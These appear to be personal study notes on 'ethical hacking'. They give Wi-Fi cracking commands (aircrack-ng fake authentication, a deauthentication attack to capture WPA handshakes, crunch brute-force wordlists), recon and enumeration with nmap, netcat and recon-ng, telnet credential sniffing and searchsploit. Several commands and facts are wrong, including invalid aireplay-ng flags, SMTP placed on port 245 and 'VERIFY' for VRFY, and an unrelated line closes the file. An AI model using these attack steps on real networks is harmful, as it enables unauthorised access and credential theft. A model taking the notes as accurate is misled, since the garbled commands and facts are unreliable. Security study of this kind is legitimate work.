Cyber Security Notes

cracking wap: => sudo -i => airodump-ng --band b wlan0

copy the specific bssid: airodump-ng --bssid {pastehere} --channel {specific_cha} --write wephack wlan0

fake authentication / arp replay attack: airodump-ng --bssid {pastehere} --channel {specific_cha} --write wephack wlan0 'first run this command to get the packets'

aireplay-ng --faekauth 0 -a {pastemachere} -h {pastewirelessmachere} wlan0 'ipconfig to get wireless lan and get the 12 digit shandic & change - to :'

aireplay-ng --aireplay 0 -b {pastemachere} -h {pastewirelessmachere} wlan0 'same comand with small changes'

aircrack-ng fakeauth-02.cap cracking wap2

capture 4 way handshake, knock user off the network then get credentials:

airodump-ng --bssid {pastehere} --channel {specific_cha} --write capturehandshake --band a wlan0 'first run this command to get the packets wlan0 is his wireless interface'

aireplay-ng -0 0 -a {router-mac} -c {client-mac} -D wlan0 ' the -0 0 is to signal de-auth attack'

create wordlist with [crunch] to bruteforce to find the password crunch 9 9 {possible-char's} -t h@@@@@@@z -o wordlist 'the last portion is a pattern for crunch to make it swap and add it to wordlist file'

aircrack-ng capturehandshake-01.cap -w wordlist 'aircrack will brute force in the thing'

PASSIVE & ACTIVE RECONNAISANCE:

  • This section deals with information gathering for target system, 1st process of ethical hacking.

    STEPS:

  • gather information

  • determin the network range
  • identifty active machines
  • discover open parts and access points -fingerprint the operating system
  • uncover services on ports
  • map the network

PASSIVE RECON: get infor without connecting. use public data to get more info 'open source data' this allows you to not be detected

ACTIVE RECON: using tool like scanner to get more data. will open you to being noticed.

recon-ng - powerful tool for recon for pen-testing. typically first tool used gived data on ip address, location, account naming convensions, users, email adress, passwords & more.

  • git-clone the recon-ng git,

run it and input these commands:

  • ./recon-ng 'to enter recon terminal'
  • help 'to see documentation'
  • marketplace search 'to see more options and places'

whois

  • another passive recon tool for kali linux can give information on: its registrar, their server names, DNS secrity, owner, registration info.

whois google.com

DNS Enumeration:

  • the tool name is dns recon.

dnsrecon will enter you into

searchDNS.netcraft.com DNS Information:

  • go to browser and searchnetcraft.com, search for msn - will give your information on the msn

Google Hacking:

  • using the google hcking database to give you information, or file types.

Shodan.io:

WWW.SHODAN.IO

  • also known as hackers google, it has info about almost every device thats connected to the internet.
  • you can find vulnarabilities about tarhets with shodan even discover known ones from OSINT

securityheaders.com: www.securityheaders.com

  • to check if website has security headers setup correct.

SSLabs.com:

www.SSLabs.com

  • tool to test server if its ssl settings are correctly set and will accet vulnrarable TLS for example.

pastebion.com:

  • place where people post random things online, also sensitive informations including email addresses, passwords and stuff from past breaches.
  • you search the clients domain and names to make sure they havent been breached.

##Active Reconnaisance tools:

NMAP:

  • this is port scanner to scan ports and find open ones and operating systems and services running in the devices.

    nmap {ipaddr} -sS 'will perfom sin scan and -sT to perform tcp scan & for all ports you add -p 1-65535' sudo nmap {ipaddr} -sV -p 1-65535 --open --vv 'see the services and version running on that open port & --vv to get very verbose' sudo nmap {ipaddr} -sV -p 1-65535 --open --vv -o /readme.txt 'we add the -o tag to put the out put to the readme file' sudo nmap {ipaddr} -sU -p 1-65535 --open --vv -o /readme.txt 'this is udp services scan' sudo nmap {ipaddr} --script-smb-os-discovery 'this script would be to look for samba service.' nmap --script-help dns-zone-transfer ' will give you documentation on how to use it' ls /usr/share/nmap/scripts will throw list of the scripts

netcat

  • established remote conection to target and scan ports & listening to connections comming into your system.

    nc -nvv -w 1 -z {ipaddr} 1-100 '-w is for no time out till a second passes, -z is so it runs faster with port range' nmap -v -p 139,445 -o readme.txt {ipaddr} 'make it run verbose and also specify ports' nc -nlvp {port} 'listening and verbose output'

SMB Enumeration:

  • serve message block enum is key to info gathering.
  • its used typically for file transfer over 139/445 n easy to exploit
  • on some device you can own the entire system.
  • nmap can also do smb attack.

NFS Enumirations:

  • network file share for gathering shares for exploitation.

    nmap -sV -p 111 -vv {ipaddr} --script-=rpcinfo 'this is to get nfs scan'

Nikto

  • finds valnurabilities in servers and web applications.

    Sparta:

  • another tool that combines many tools into one interface for faster and more automated information.
  • some of the tools inclue nikto, hydra and nmap and a screenshot tool.
  • port scan, web app scan and brute force just by giving the IP Address.

smtp Enumerations:

  • simple mail transport protocol runs over port 245 and can be used to gather information that is open

    nc -nv {ipaddr} 25 'get port 25 traffic' VERIFY root 'if something comes back it means we have one'

openVAS vul scanner:

  • is open source vul canner thats free and not rebust as nessus. must be set up correctly to work that good

Launching an attack

5 phases of attack:

  • Reconnaissance

    passive - indirect interaction and active - connectio based interaction

  • Scanning

    gathering information mapping the network/system out and seeing how they are connected as departments.

  • Gaining Access

    when damage is done and getting permissions to do certain things. Architecture and configurations & skills will actually determine how deep hey can go.

  • Maintianing Access

    removing the evidence of intrusion or trojen horse is kept to repeat access over time or rootkits to gain access or transfer valuable information and permissions. use honeypots to trap the intruders

  • Covering Tracks

    trojents like ps / netcat are used to hide the intrussion. steganoghraphy - hiding data in other data, like hiding image in sound, tunneling - taking advantage of transport protocol by adding another or taking advantage of connection.

Social Engineering:

  • manipulating users to reveal confidencial information.
  • phishing - gathering information, using sms, email to make them spill the beans.
  • watering hole - adding malicious code where user visits alot
  • pretexting - catfishing a user to get private information

Taking advantage of telnet:

  • remote management service that runs in 23. it was replaces by ssh due to lack of encryption.
  • we can use wireshark to capture the packets from that connection and see credentials.

    sudo wireshark 'connect your ip address and choose subnet and listen' sudo install telnet telnet {ipadd} 23

After finding the open ports and running services you wana go to exploit database and search for the service and how its exploited typicaly this is the pentester documentation search engine.

getting exploits from Searchsploit:

  • list of exploits will have names, file path.

    searchsploit -m filename.ext 'this method allows you to copy the file into your directory, also check the exploit if its remote or not'

sages of the talmud